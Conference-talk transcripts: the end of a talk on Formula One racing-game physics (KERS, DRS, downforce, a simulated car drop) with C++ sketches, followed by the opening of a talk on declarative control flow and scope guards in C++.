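        return 0.5 * ((2.0 * b) +
                      (-a + c) * t +
                      (2.0 * a - 5.0 * b + 4.0 * c - d) * t2 +
                      (-a + 3.0 * b - 3.0 * c + d) * t3);
    };
    return { interp(p0.x, p1.x, p2.x, p3.x),
             interp(p0.y, p1.y, p2.y, p3.y),
             interp(p0.z, p1.z, p2.z, p3.z) };
}
```

Sampling this densely along consecutive control-point quads gives a smooth centreline, and the barriers, lights, and warning signs can then be placed at offsets from the sampled points.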
You can see that every time I crash, the damage on the car increases and the speed decreases. Here's the driver input, showing the steering, the brakes, the throttle and so on. Now, this is simplified telemetry. In the physics engine I'm working on, I've included KERS, the kinetic energy recovery system, which is kind of like a battery system they have in Formula One. When you accelerate, you can press the KERS button and that gives you extra horsepower, so your car accelerates more. When you come into a corner, it's kind of like a Toyota Prius: if you use the brakes, it uses regenerative braking to charge up the battery. So the battery charges up, you go around the corner, and then you accelerate out of it. I did that for a couple of reasons. Firstly, a lot of people playing driving games don't use the brakes, which is a really bad idea, because lap time is really set by effective braking — so it encourages people to brake. It also puts a bit of strategy into the game: when do you use KERS? Where is the best place to deploy it? Comparing the telemetry data between two different laps lets you analyse that as well. I also put DRS in, because they've got that in Formula One — it makes the cars go faster by reducing the aerodynamic drag and also the downforce. So I've put those in the game, and you could see those two forces when I was playing; I'll show you how they work. The KERS system has this battery you can use to accelerate, as I mentioned, and when you brake it charges up — we see that graphic on the screen. The DRS system on a Formula One car — I've done this really cheesy diagram here — basically has a flap that opens, and it changes the downforce and the aerodynamic drag. It's quite a small effect in Formula One.
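The KERS behaviour described here — braking charges the battery, deploying it adds extra engine power — can be sketched in a few lines. This is a C++ reconstruction, not the game's code, and the capacity and rates are illustrative numbers I've made up:

```cpp
#include <cassert>

// Sketch of a KERS battery: regenerative braking charges it,
// pressing the deploy button drains it for extra power.
struct Kers {
    double charge = 0.0;                              // joules stored
    static constexpr double kCapacity   = 400000.0;   // J, illustrative
    static constexpr double kChargeRate = 60000.0;    // J/s while braking
    static constexpr double kBoostPower = 80000.0;    // W while deployed

    // Called each frame; returns extra engine power (W) for this frame.
    double update(bool braking, bool deployPressed, double dt) {
        if (braking) {
            charge += kChargeRate * dt;               // regenerative braking
            if (charge > kCapacity) charge = kCapacity;
            return 0.0;                               // no boost while braking
        }
        if (deployPressed && charge > 0.0) {
            double used = kBoostPower * dt;
            if (used > charge) used = charge;         // battery can run dry
            charge -= used;
            return used / dt;                         // extra power delivered
        }
        return 0.0;
    }
};
```

The strategic element falls out naturally: you can only deploy what you banked under braking, so braking hard into corners pays off on the following straight.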
I think they get something like 17 kilometres an hour of extra speed from it, so I've really exaggerated the speed effect you get in the game from using the system. I've talked a lot about downforce. One of the things that's always astounded me about Formula One physics is that the downforce on a Formula One car travelling at full speed — forces are measured in newtons, but it's a force equivalent to about 2,500 kilograms. The minimum weight of a Formula One car is something like 750 kilograms, and they typically weigh around 800 kilograms with a bit of fuel and the driver. That means the downforce on the car is far, far more than the weight of the car, and that's really what's keeping the car on the track as it goes around a corner. Theoretically, a Formula One car could drive upside down on a roof, because there's so much downforce above a certain speed. It never happens in real life, but at the Belgian Grand Prix, driving up the corner called Eau Rouge, there's actually negative 1G on the driver as they come out over the top. If it wasn't for the downforce, the car would fly off the track, and if the driver wasn't strapped in, he would fly out of the car as he went around that corner. So it must feel incredible for the driver. It really blows my mind how they do this: think about the size of the wing an aeroplane needs to take off, and then look at the size of the wings on that car, producing 2,500 kilograms equivalent of downward force with these tiny wings — they're really trying to make them as effective as possible. But we can't do this in real life; we can't drive Formula One cars upside down.
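Since downforce grows with the square of speed, those figures let us estimate when upside-down driving becomes possible. If a car generates a known downforce at a known speed, the minimum speed at which downforce alone exceeds the car's weight follows directly. The 2,500 kg and ~800 kg figures are from the talk; the 320 km/h reference speed is my own illustrative assumption:

```cpp
#include <cassert>
#include <cmath>

// downforce(v) = k * v^2, so k = refDownforce / refSpeed^2.
// Upside-down driving needs k * v^2 >= mass, hence
// v = refSpeed * sqrt(mass / refDownforce).
double minUpsideDownSpeed(double refSpeedKmh, double refDownforceKg,
                          double carMassKg) {
    return refSpeedKmh * std::sqrt(carMassKg / refDownforceKg);
}
```

With 2,500 kg of downforce at 320 km/h and an 800 kg car, this comes out at roughly 181 km/h — comfortably within racing speeds, which is why the upside-down track section in the game is feasible in principle.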
However, in the simulation I did add the code so we can turn the game world upside down. I wanted to test whether the car would stay on the track because of the downforce. One of the things I'm going to do with the track mods is make a section of track that goes upside down, so you have to drive at a certain speed on that section if you're going to stay on it. So I should be able to start the game and select the beginner track here. A couple of extra controls on the Xbox controller, on these buttons, let me rotate the game world and move it around. Let's see if I can get up to the appropriate speed — there's a fairly straight section of track where I should be able to rotate the game world and see if we've got enough downforce to stay upside down. Let's give it a big boost on the DRS and see if we can do this. So we are driving upside down now, and if I crash or brake, eventually we're going to fall off the game world. I'll turn the world back over and get back onto the track. I would really like to put in that section of track — I've not seen a driving game where you can use downforce to drive upside down, but it must be quite a fun thing to make happen, because it would actually happen according to the laws of physics, if not according to the laws of the road. Finally, one of the things that interests me is the sort of crazy stuff they do with cars on Top Gear. Did anybody see this episode? They had a Porsche and a VW Beetle, and they did a drag race between them. Now, obviously the Porsche is going to win a drag race.
So what they decided to do, to make things a little more fair, was to take the VW Beetle one mile above the desert by helicopter, drop the Beetle, and see if the Porsche could complete the one-mile sprint before the Beetle hit the ground. There's a clip on YouTube showing what happened — I did bookmark it here. This was Richard Hammond with the cars, talking about the physics: terminal velocity, the speed of the Beetle, what the acceleration of the Porsche is going to be, and whether it's theoretically possible for this to work. And then they go and test it in the real world. I'm a bit concerned that he's wearing a crash helmet — it's not really going to be much protection if the car lands on his head. But they went through with the test. And I thought, well, how can we make that happen in the game world? So what I did — and I can switch back to the workshop version of the game — was build exactly that. I actually did this this morning in the hotel room. I've built this Top Gear test car, which is an actual class, and I really wanted to use it to show a bit about how that Euler calculation works, because in the full game model there are so many different variables going on that it's a challenge to show the code on screen. This is more basic: it's just a falling object we're simulating. Again, I'm starting off with my constants: a friction coefficient, the mass of the car, gravity — 9.8 metres per second squared — the upward direction and the forward direction, the position where the car is going to land, and the height in metres we're going to drop the car from.
And we've got the track sector in the game world where the car is going to hit the track. That's used to work out whether, when the car hits the track, we're before or after that particular sector, which decides if we've passed the Top Gear challenge or not. Variables: position, velocity, and whether the challenge is complete. When we create a new instance, we put the car at the fall position plus the height — these are Vector3 calculations — so I'm figuring out where the car starts. The velocity is zero and the challenge-complete flag is false. That happens when we start a lap. Then we've got the Euler physics method, the update method. Again, this is what I was talking about on the slides: we get the frame time, in fractions of a second. The first thing we do is calculate the aerodynamic drag force on the car. Remember, that's equal to the velocity squared multiplied by the drag coefficient. Because these are vectors, the drag force is a negative force — it's slowing things down — so I take minus the velocity, a vector quantity, multiply it by a scalar quantity, the length of the velocity vector (because we're squaring it), and then multiply by the friction coefficient. So that's the aerodynamic drag force. We then figure out gravity, which is equal to mg — mass times the gravitational acceleration. Then we figure out the resultant force on the car, which is this Vector3 here. Force equals mass times acceleration, so — again, school-kid physics — we work out the acceleration by dividing the force by the mass.
We then work out the velocity by adding the acceleration to the velocity, taking the frame time into account — the change in velocity gets smaller as the frame time gets smaller, which means the car falls at the same rate even if the frame rate varies. We do the same thing with position: we recalculate the position from the velocity and the frame time. Okay, let's see if this works. What this should simulate is that same challenge from Top Gear. Let's see if I can do this, because it was quite a challenge to get it working. I'm going into the options to turn off post-screen effects, because those do the lens blur and the sun reflecting off objects, which makes it hard to actually see the falling car. I'll select the Windows Azure car and this track here. What you should see is a small dot at the top of the screen — the falling car — and it will gradually fall to earth as I'm driving around. If I don't crash — I did actually crash there, so maybe I'm not going to make the challenge this time. You can see the car getting closer to the earth, and it's looking like I'm not going to make it. So the challenge failed, because the car hit the track before I got to that section. Let's see if I can do it again and actually succeed. It is the last session, and we could be here a long time if I don't manage to nail it, so I'll concentrate a bit more and stop talking while I do it. This is looking better. I'm going to do that one more time — sorry about that. This is looking better. Yeah, I think I managed it. Thanks for that.
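The Euler update just described — drag opposing velocity and growing with its square, gravity pulling down, F = ma, then integrating velocity and position — can be sketched as follows. This is a 1D (vertical-only) C++ reconstruction of the falling test car; the game does the same with Vector3 values, and the mass and drag coefficient here are illustrative:

```cpp
#include <cassert>
#include <cmath>

struct FallingCar {
    double mass = 800.0;     // kg (illustrative)
    double dragCoeff = 0.5;  // N per (m/s)^2 (illustrative)
    double y = 1609.0;       // dropped from roughly one mile up
    double vy = 0.0;         // vertical velocity, m/s

    void update(double dt) {
        double drag = -vy * std::fabs(vy) * dragCoeff; // opposes motion, ~v^2
        double gravity = -mass * 9.8;                  // weight, downward
        double accel = (drag + gravity) / mass;        // F = ma
        vy += accel * dt;                              // integrate velocity
        y  += vy * dt;                                 // integrate position
    }
};
```

Terminal velocity is where drag balances gravity, v_t = sqrt(mg/k); with these numbers that's about 125 m/s, and the simulated car settles onto it after a few seconds of falling.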
So yeah, I think there's an opportunity there — I like those Top Gear challenges. Does anybody make a driving game based on doing Top Gear challenges? I think that would be good fun, with all that crazy stuff in there, and a good marketing opportunity too. Just rounding off the session: I've talked a lot about my hobby project with physics and playing around with this stuff. Game development is great — it's really creative and great fun to work with, and there are marketing opportunities there. However, the people I've talked to who've been involved in the games industry say it's a lot of hard work, and there's maybe not that much money in it unless you're doing it out of interest. Is anybody here working in game development? Solo game development? So basically I treat it as a hobby project — good stuff to play around with. I do a lot of training, and one of the things I was thinking of doing is going to schools and universities and talking about physics and games and how this stuff relates. It's good fun to play around with, and it's pretty addictive — you can spend an unhealthy amount of time trying to get this stuff to work — and it's a great way of building up your coding skills. I do have a few more resources if you're interested in looking further into game programming and game development. First of all, the Pluralsight course that I did. It's not really about the game development itself; it's more about how you can integrate a game with cloud services like Windows Azure. There I talk about using blob storage for the ghost cars, table storage for the lap time and telemetry data, and how to queue the telemetry data and get it into the cloud for processing.
I think telemetry and the Internet of Things is going to be the next big thing. There are a lot of scenarios — what you can do with telemetry data and a Raspberry Pi, a fleet of taxis pushing telemetry data into a cloud-based service through some kind of connected device. Coffee machines and heating systems are going to be automated; people are doing hobby projects with home automation and cloud services. It's the same techniques as in the game and in the telemetry processing I was talking about. Then there's Gary Simmons at gameinstitute.com — he's done a course on how to build a racing game in Unity. If you subscribe to that site — currently I think it's 49.95 for a year's subscription to the Game Institute, which is a really good price — you get the source code for that game, and the quality of the videos he's done is incredible. He talks about how the driver AI works and how the physics works; he builds on the physics engine, so he's using the Unity wheel colliders and all that type of thing. I record my own courses, and I was really impressed by the way he goes out with a film crew to a motor museum and spends time talking about the theory behind the game. There's some really good stuff there, and if you'd rather work with Unity than XNA, you also get the Unity source code to that racing game, which you can customise, experiment with, and change as you like. Thanks very much for listening. My name is Alan Smith. I'll be around for a bit — I've got to run off and catch my flight, so unfortunately I won't be around this evening — but if you have any questions about Windows Azure, games, XNA, physics, or Formula One, I'll be hanging around for a few minutes. Thanks very much. Enjoy the evening and the rest of the conference.
This entertaining and demo-intensive session will lift the lid on the black art of physics simulation in computer games. The sample scenario will be the re-writing and testing of the physics engine in a sample 3D driving game. Starting with the basics of force, mass and acceleration, the simulation will be gradually enhanced to include lateral and vertical g-force, tire slip, down-force and collision detection. The addition of a drag reduction system (DRS) and kinetic energy recovery system (KERS) will round off the demo, and add a strategic element to the game. The techniques demonstrated can easily be applied to 2D and 3D games on any technology to improve the responsiveness, feel and overall playability of the game. The trade-off between the purity of the simulation and the all-out fun of arcade style games will be discussed and demonstrated, along with plenty of tips for developing, testing and fine-tuning the physics model. Whether you are learning to develop 3D games in Unity, MonoGame or another technology, interested in learning more about what makes gaming physics simulations tick, or just want to kick back and see how much fun you can have with C#, this session will have something for you. You will also have the chance to install and play the game, test the physics implementation for real, and compete with other attendees for the best lap time!
10.5446/50577 (DOI)
Hi everybody. I hope you've had a great lunch. My name is Andrei Alexandrescu, and I'm going to talk about declarative control flow, which is a combination of words that makes surprising sense given the circumstances — I'm going to explain what I mean. The title in your programmes, "Error handling in C++", was an unfortunate small error; this is, I think, quite a bit more interesting, and for the people who were in my workshop the day before, it's going to add to it nicely. By the way, who here was in the workshop? All right, great — I'm glad you're here. Those who didn't raise their hand, don't worry: there's enough context for anyone to pick this up. I should say it's 46 slides we're looking at, which comes to two minutes per slide — I can't do better than that, so we've got to hurry quite a bit. I'm going to talk about what motivates the whole approach to declarative control flow, then discuss some implementation, and finally some use cases that make the whole thing interesting. This was in the workshop as well: I'm discussing a very common pattern of writing programs, which starts with doing something that has a cleanup associated with it — opening and closing files, et cetera. After the cleanup comes whatever is next in the plan. The interesting thing is, if the next thing in the plan fails, we need to roll back — a typical transactional, database-y kind of thing, but it appears in a lot more programs than just databases. So let's see how this simple pattern gets implemented. We're going to look at its implementation in a few typical languages, and I'm going to expand a bit on what I discussed during the workshop. In C, we can assume the action returns some Boolean telling us whether it worked. So if the action works and next also works, we just do the cleanup.
But if the action worked and next didn't, I'm going to roll back the action — take it back, and not only clean up but also roll back what I've done. By the way, there are very many people who have an airplane to catch, so if somebody leaves, you should know it's the airplane — they're not leaving in protest or out of sheer boredom. Okay, excellent. Now here's the thing: once you have this pattern in C, the problem occurs when there's more of the same, which we're going to see soon. But for now, let's focus on the simple pattern. In C++, if you want to be politically correct, we go with Resource Acquisition Is Initialization and associate the action and the cleanup with an object — this is like pretty much any book on C++ since 1984. The problem, however, is that the whole rollback business is a bit more complicated. You create an object that takes care of the action and the cleanup, which is nice. What's not so nice is that to do whatever comes after the action, I need a try-catch statement to roll back the code by hand, then rethrow whatever exception I got, and off I go on my merry way. So it becomes more complicated because of this pesky rollback. In Java and C#, there's no way but to use try-finally: if the action fails, I do the rollback, and by the semantics of these languages I also fall through to the finally, so I do the rollback and the cleanup. Who knows one of these languages, C# or Java? Okay — no secret there, no real interesting stuff. In Go, we have the defer statement, which actually allows you to register cleanup.
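The C++ shape just described can be sketched like this. RAII handles the cleanup automatically, but the rollback still has to be written by hand with a try/catch and a rethrow. The "action" here is a stand-in that records into a log string, purely for illustration:

```cpp
#include <cassert>
#include <stdexcept>
#include <string>

std::string g_log;  // records what happened, in order, for illustration

struct Action {
    Action()  { g_log += "action;"; }   // do the action on construction
    ~Action() { g_log += "cleanup;"; }  // cleanup always runs (RAII)
    void rollback() { g_log += "rollback;"; }
};

void transact(bool nextFails) {
    Action a;  // action done; cleanup guaranteed by the destructor
    try {
        if (nextFails) throw std::runtime_error("next failed");
        g_log += "next;";
    } catch (...) {
        a.rollback();  // undo the action by hand...
        throw;         // ...then rethrow to the caller
    }
}
```

On success the log reads action, next, cleanup; on failure it reads action, rollback, cleanup — the destructor still fires during unwinding, but the rollback is explicit control flow, which is exactly the complaint.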
However, the cleanup is going to run at the end of the current function, not at the end of the scope, which makes it kind of a fail when it comes to composition. Now, speaking of composition — this is the elephant in the room. This is a photo I really like, because it shows the elephant in the room, but the elephant is patterned the same as the wallpaper, so it's kind of difficult to see. It's an elephant, but at the same time a bit subtle — you don't see it immediately. So, when it comes to composition — you have to do two things, each with its own cleanup and each with its own rollback and all that jazz — I can see people already going, oh my God, what's going on here? Well, first of all, I'm going to have a very long if statement, which I'm sure you recognize from code that you didn't write but need to read, right? I'm sure you didn't write it. (I have a video of me falling off a stage, I should say, and the first thing I did was raise my hand and say, I'm all right — I didn't die.) Okay. If the first action doesn't succeed, we're done here. If it does succeed and the second action also succeeds, we try to do whatever follows the second action. Essentially, in this code I'm expanding by hand what we had in the first example, by expanding the "next" step: action one works, action two works, but what follows doesn't work any more. So I need to roll back both, and I need to be careful to roll them back in the opposite order — rollback two, then rollback one — rolling things back nicely in a stack-wise manner. Then it's time to clean up action two, because it was right here. And if action one succeeds but action two fails, I roll back action one, and at the end I clean up action one.
This is — I'm sort of losing my ability to explain it, because it's a complicated pattern, and with three or more of these it becomes very complicated. Who knows of a C idiom that takes care of all this stuff? People who were not in the workshop should answer this. What pattern do you know in the C programming language that takes care of functions that can fail in multiple places and need to do cleanup and rollback? Goto cleanup — I'm going to say it, okay? As I said in the workshop, I've been working with companies whose coding standard disallowed all uses of goto except for "goto cleanup", because goto cleanup is okay — because otherwise you need to put up with this kind of stuff. With goto cleanup, you have your code, and if anything bad happens, you have a few cleanup labels that roll back whatever was happening. This goto pattern has been made famous recently by what? By the Apple bug. The news hasn't faded yet — it's been just a couple of weeks — the famous bug that had "goto fail". Actually, goto fail is the better idiom name, because it's kind of ironic. Anyhow, it became unpleasant enough that people allowed the use of goto for such patterns — there you go, this just underlines what I was saying. We have gotos down to several labels, several rollback actions, several cleanup actions, and it's all a tolerated idiom, because people would have a lot of difficulty coding otherwise. In C++, we have two classes that compose things, and it gets more complicated if either or both of them have rollback code. If you only have cleanup, that's fine, because the destructor takes care of it.
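For reference, the tolerated "goto cleanup" idiom looks like the sketch below, written so it also compiles as C++. Each acquire step that fails jumps to the label that releases everything acquired so far, in reverse order; success falls through the same labels. The acquire/release calls are stand-ins that log to a string for illustration:

```cpp
#include <cassert>
#include <string>

std::string g_trace;  // records the order of operations, for illustration

bool acquire(const char* what, bool ok) {
    if (ok) g_trace += std::string("acquire ") + what + ";";
    return ok;
}
void release(const char* what) {
    g_trace += std::string("release ") + what + ";";
}

// Classic goto-cleanup shape: failures jump to the matching cleanup label,
// and the happy path falls through the same labels in reverse order.
bool doWork(bool secondOk) {
    bool done = false;
    if (!acquire("one", true)) goto fail;
    if (!acquire("two", secondOk)) goto cleanup_one;
    done = true;              // the happy path
    release("two");
cleanup_one:
    release("one");
fail:
    return done;
}
```

It works, and it keeps the cleanup in one place, but every new resource adds a label and another place to get the ordering wrong — which is the motivation for doing it declaratively instead.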
But if you have rollback to do, then you have to resort to placing the mainline code into these weird code structures. Same deal in Java and C# — the code gets complicated. Same deal in Go — the code gets complicated. So my conclusion, after analysing such pieces of code, is that explicit control flow is the problem, especially when the control flow goes three ways: one way is the cleanup, in the case of success; another is the rollback in case of failure. Whenever you have these complicated control-flow structures, taking care of everything explicitly is going to be difficult. So here's what we're going to do, and here's where we look into a different way of doing things, which I find from experience is a lot better. We're going to take a page from a different subdomain of computer science: declarative style, declarative programming. Declarative programming generally focuses on stating the desired accomplishments — I want to do this, I want that done. That's what you write; you don't write exactly how things are done. It's the polar opposite of describing how things are being done, and that's a nice high-level thing to remember: imperative programming is "do this and that and the other", and declarative programming is "I want this accomplished, and you take care of the rest". There are a number of famous languages built on this declarative approach. Because of that, control flow is minimal and for the most part absent, because it's the language, or the framework — the fabric underlying the language — that takes care of the flow. Execution is implicit as opposed to explicit. And there are a lot more examples of this than you may think.
It's not only Prolog, because whenever anybody talks about declarative programming, they say, oh, Prolog, that's it. Actually there's a lot of stuff, some of which you may be using on a daily basis. SQL: you declare what needs to be accomplished, and the entire optimization and execution aspect, the scheduling and asynchrony, all of them are implicit. At Facebook, just as an anecdote, I've been working on a system that does some machine learning, implements a graph-based machine learning algorithm, and I had two versions of it. One was a 5,000-line program written in C++ and the second was a 20-line SQL program. And they did the same thing. Granted, the SQL program was slower, so it did things a lot slower, but it was a lot easier to understand for people I might show the thing to. And it was a lot easier to experiment with, to kind of think of ways of improving it. So the compression ratio of SQL is pretty astonishing if it happens to fit the problem domain well. Regexes, for better or worse, are kind of a declarative system. Make: in the makefile specification, you state goals and actions, you don't state the order in which things should happen. The engine of make is going to create a graph and take care of all the dependencies and how to execute everything. A variety of configuration programs and systems do things the same way. So, okay, let's take a page from the declarative programming domain and see how we can apply it to this whole control flow business. Just to wrap this up, according to a famous Seinfeld bit, declarative is the airplane ticket that says, you know, I'm flying from Oslo to Copenhagen, and imperative would be, you know, all the levers and buttons and actions that the pilot is going to go through to make that happen. All right. Well, as an example, destructors, which have been very successful in C++, you can think of them as some sort of a declarative thing, because they're invoked automatically.
They're automatic and they're everywhere. So, well, it states the needed accomplishments: whenever you build this guy, you do this; whenever this guy is gone, you do that. And that's pretty much it. Execution is implicit. Did you ever write a destructor call? Yes. There should be hands. Yes, okay, there are hands. Okay. So, you know, sometimes you may write a destructor call, but it's exceedingly rare compared to the frequency with which they are just invoked implicitly. Control flow is simplified by destructors a lot. So, you know, we can think of RAII as some sort of declarative programming in disguise kind of thing. Which is nice. As I said in the workshop, there's an artifact called scope guard. If you Google for it, you're going to find it. It's going to be in the first, like, five results. It's an article I wrote back in the 2000s. And, you know, as I like to joke, because I ask people, like, did you hear about it? And nobody heard about it. But let me say it's very popular outside Norway. Let me kind of clarify that. So, it's been a longstanding idiom in which you specify, for each action, which action is going to undo it, and such. I'm not going to insist a lot on scope guard except for the SCOPE_EXIT pseudo statement. SCOPE_EXIT is going to allow you to specify code that's going to be executed automatically, keyword automatically, whenever the current scope is exited, right? Which is really nice. Just to recap a little code from the workshop, the way it works is, SCOPE_EXIT is a complicated macro that, let me see how much, okay. It's going to introduce a complicated macro that in turn is going to introduce an anonymous variable that starts with scopeExitState. And as I'm going to show in a minute, it has a suffix that's numeric and unique.
And it constructs a sort of a scaffolding object plus, and who recognizes this among people who are new to this? What is that? I'm not going to continue until we get the answer. So, we have, you know, a lambda introducer, Nico just talked about this, right? It's the beginning of a lambda, right? What follows here should be the opening curly brace. So, this is the beginning of a lambda, and because it's a macro, this part is going to be generated by the macro, and people are going to have to just write the code after it. The example I gave also during the workshop is SCOPE_EXIT: we're going to close the file and delete the file. And notice that as the code flows down, I can plant one or more actions with SCOPE_EXIT, and they're going to be nicely executed in a stack manner when the scope is done. So, I create a file, and then on scope exit, I'm just going to close it and delete it. And then I'm going to allocate some memory, for example, and when the scope is done, I'm going to free it, and then I'm going to go about my business, no problem. The nice thing here is that the flow is automated. I don't need to write ifs and tries and things, right? It just flows, right? So, this is a recap of sort of the workshop, because I do have new stuff for you. So, don't despair. Then it's like, oh my God, I'm in the wrong talk here. What's going on? Okay. So, as I wrote during the workshop, and actually the first time at C++ and Beyond 2012, I wanted to also have a SCOPE_FAIL pseudo statement which says: if the current scope is exited not in a normal way but by means of an exception, in that case, I want to execute a different piece of code which is going to do my rollback, right? Because we have, you know, we have the action, we have the cleanup, but we have the rollback, and this is sort of the missing piece in the troika that we discussed in the opening. So, all right. Well, here we kind of turn a new page in the history of computing.
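Before moving on, the SCOPE_EXIT machinery just recapped might look like this self-contained sketch. The names (`ScopeGuardOnExit`, `scopeExitState`) loosely follow the slides, and Folly's real implementation is more careful about copies and exceptions.

```cpp
#include <cassert>
#include <utility>
#include <vector>

// A guard that runs a stored lambda when destroyed.
template <class Fun>
class ScopeGuard {
    Fun fn_;
public:
    explicit ScopeGuard(Fun&& fn) : fn_(std::move(fn)) {}
    ~ScopeGuard() { fn_(); }
};

enum class ScopeGuardOnExit {};

// operator+ lets the macro end right before the lambda body the user writes.
template <class Fun>
ScopeGuard<Fun> operator+(ScopeGuardOnExit, Fun&& fn) {
    return ScopeGuard<Fun>(std::move(fn));
}

#define CONCATENATE_IMPL(s1, s2) s1##s2
#define CONCATENATE(s1, s2) CONCATENATE_IMPL(s1, s2)
// Expands to: auto scopeExitStateN = ScopeGuardOnExit() + [&]()
// so the user-written { ... }; becomes the lambda's body.
#define SCOPE_EXIT \
    auto CONCATENATE(scopeExitState, __COUNTER__) = ScopeGuardOnExit() + [&]()

std::vector<int> order;  // records the order in which the guards fire

void demo() {
    SCOPE_EXIT { order.push_back(1); };
    SCOPE_EXIT { order.push_back(2); };
    // planted actions run in reverse (stack) order when the scope exits
}
```

Calling `demo()` leaves `order` as {2, 1}: the second guard fires first, which is the stack behavior mentioned above.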
Actually, it's possible to implement SCOPE_FAIL today on all major compilers. It's not portable C++ yet, but Herb Sutter is working on integrating it within the next iteration of the standard. I don't think it's going to be ripe for 2014, but it will be ripe for 2017. So, those of you who are younger than me can rejoice. Now, for completeness, we would like to have also a SCOPE_SUCCESS kind of thing, which would complete a three-legged stool. So, you have SCOPE_EXIT, which executes code when the current scope is exited, no matter how. The second would execute code if the current scope is exited via an exception, so something bad happened. And the third would be the logical complement: execute code only if the current scope is exited normally, right? So, we'd have a reason to celebrate and say, oh, okay, so if the current scope made it, then we can log that it was all okay. So, I have this fantastic trifecta here that's really nice and declarative. It's very pleasant to work with because it doesn't complicate code at all; on the contrary, it simplifies it. And notice that, you know, the whole deal here is that we don't need to specify flow explicitly. This is beautiful. So, it's going to take care of all the tries and catches and finallys and whatnot. It's going to be all automatic. All I need to do is make sure I plant things properly, these sort of scope hooks, in my program. So, you know, just like in other examples of declarative programming, I'm declaring circumstances and goals. So, you know, this is sort of the new part of this talk compared to the workshop. This is doable. We can do it as of today. And here's how. So, there's a proposal that you may want to peruse, N3614, which essentially makes this whole idiom portable to all compilers. But what I'm going to show you today is code that works on GCC and Microsoft. Who uses GCC? All right, Microsoft? All right. Awesome. It's like 40/60, right? Excellent.
Who uses something else than these two? One guy. Okay, you can go. Okay. It may become 100% portable, so you're not wasting time. I have to give credit where it's due. Evgeny Panasyuk from Russia, he wrote me, because I'd said that if anybody knows how to make this work, you should write. So, he wrote me, and he had a full-fledged implementation going. So, he has credit for most of the work. Also, Daniel Marinetskyou, he implemented Evgeny's idea, sort of the basic approach, in Facebook's Folly library, which I highly recommend you look at. It's an open source library of high-performance C++ code that we use intensively at Facebook. And it's growing by the day, and it's a great library that has a lot of interesting stuff in it. All right. So, to start with, I'm going to build a bit of scaffolding, a bit of helpers, right? And my first helper is going to be an uncaught exception counter. This little artifact is going to count how many uncaught exceptions are right now in flight. Okay? And here's some private data, some private stuff, that we're going to get to in a minute. But the interesting part is, well, the constructor is going to initialize the exception count to the current uncaught exception count. And we're going to have a query, isNewUncaughtException, which says: did this scope that this object is in generate an exception right now? And it's going to return whether the current getUncaughtExceptionCount is greater than the exception count I saved when I entered this object's lifetime. So, consider this. Code flows, an object of this type is created. I save the getUncaughtExceptionCount. Let's say at this point there are, like, zero exceptions in flight. There's no exception. And then later on, if somebody does throw, I'm going to call this function, and isNewUncaughtException is going to return true, because one is greater than zero.
I'm going to have an exception in flight. What if, it could so happen, if I try and catch and inside have objects constructed and other try-catches and, you know, stuff like that, it could be the case that there are several exceptions kind of waiting their turn. They're not all flying at the moment per se, but they're kind of waiting their turn. And that's why, who knows here about std::uncaught_exception, std uncaught underscore exception? Okay, so, yeah. Okay. I'm glad you don't, because you shouldn't. It's wrong. It's not a good thing. I just wanted to preempt the question of, oh, how about that std::uncaught_exception? What's going on with that function? It doesn't work, essentially. And if you Google for articles on uncaught_exception, you're going to find why. All right. So, of course, you know, this is a simple thing to look at, but the key here is, like, you know, how do we implement this getUncaughtExceptionCount? Here's where the interesting, you know, dragons come about. Well, on GCC and Clang, all you've got to do is two casts, an undocumented function, and add sizeof(void*), and you're done. That's it. It's a very simple thing to do and very, very understandable. It's self-documenting code. The keywords are blue, right? So, is there one underscore too many here or here? You're kidding. Okay. Yeah. If you have too many underscores, then you probably missed a few. So, all right. So, what happens with this is, essentially, it peeks into the global data section of the running program and, essentially, you know, kind of bumps the pointer up a little bit, and it just happens to access the actual counter, the value of the exception counter in the running program, and it just fetches that guy. All right. So, this is pretty nice, and it's undocumented, but it is sort of internally documented.
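For reference, the counter being reverse-engineered here was eventually standardized: C++17 added std::uncaught_exceptions(), note the plural. A sketch of the helper class on top of the portable function; the `Probe` struct is my own test rig, not from the talk.

```cpp
#include <cassert>
#include <exception>

class UncaughtExceptionCounter {
    int exceptionCount_;
public:
    UncaughtExceptionCounter() noexcept
        : exceptionCount_(std::uncaught_exceptions()) {}
    // True iff a new exception has been thrown since this object was
    // created, i.e., the enclosing scope is being exited via an exception.
    bool isNewUncaughtException() const noexcept {
        return std::uncaught_exceptions() > exceptionCount_;
    }
};

// A probe whose destructor records whether it ran during stack unwinding.
struct Probe {
    bool* out;
    UncaughtExceptionCounter counter;
    explicit Probe(bool* o) : out(o) {}
    ~Probe() { *out = counter.isNewUncaughtException(); }
};
```

Destroying a `Probe` during unwinding records true; destroying it on a normal scope exit records false, which is exactly the distinction the guards below need.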
So, you know, Evgeny kind of looked it up in unwind-cxx.h and figured out how it works, and it's been working reliably for a few versions now. So, you can count on it. And we need to declare some externals just to make this work. We're going to say, well, extern "C", these are my globals, and there's an opaque structure there. So, pretty much with these two pages of code, I mean, this little code, we have the exception counter taken care of. That's for GCC and Clang. Well, in MSVC, the story is a bit less portable, because, for example, versions prior to 8 could not work with this. By the way, who uses MSVC 8 or prior? Okay. So, well, talk to your manager, upgrade. It's a good product. They don't pay me, but you should know. I don't use it. So, all right. So, I see everybody is very interested in this whole deal. All right. So, in MSVC, we kind of have to introduce similarly a few opaque declarations and things like that. And, you know, we're back to the same deal where _getptd is going to return our global data segment, and then we're going to do a little arithmetic to peek into the right place for the global exception counter. Nice. So we have these. They are not slow, these functions. They don't do unwinding. You know, this whole _getptd thing is just one or two indirections away. It's a simple data access. And similarly for GNU, the __cxa_get_globals is also one indirection away. So we're in good shape. It's a cheap function. It looks hairy, but it's cheap. All right. Well, now we're done. And let's use this scaffolding that we created, let's use it for fun and profit. So for that, we create another helper class called ScopeGuardForNewException. So this guy is going to automatically call a function, which could be any piece of code by means of lambdas, whenever a new exception is being thrown. So we have a function, which is the guy I'm going to call.
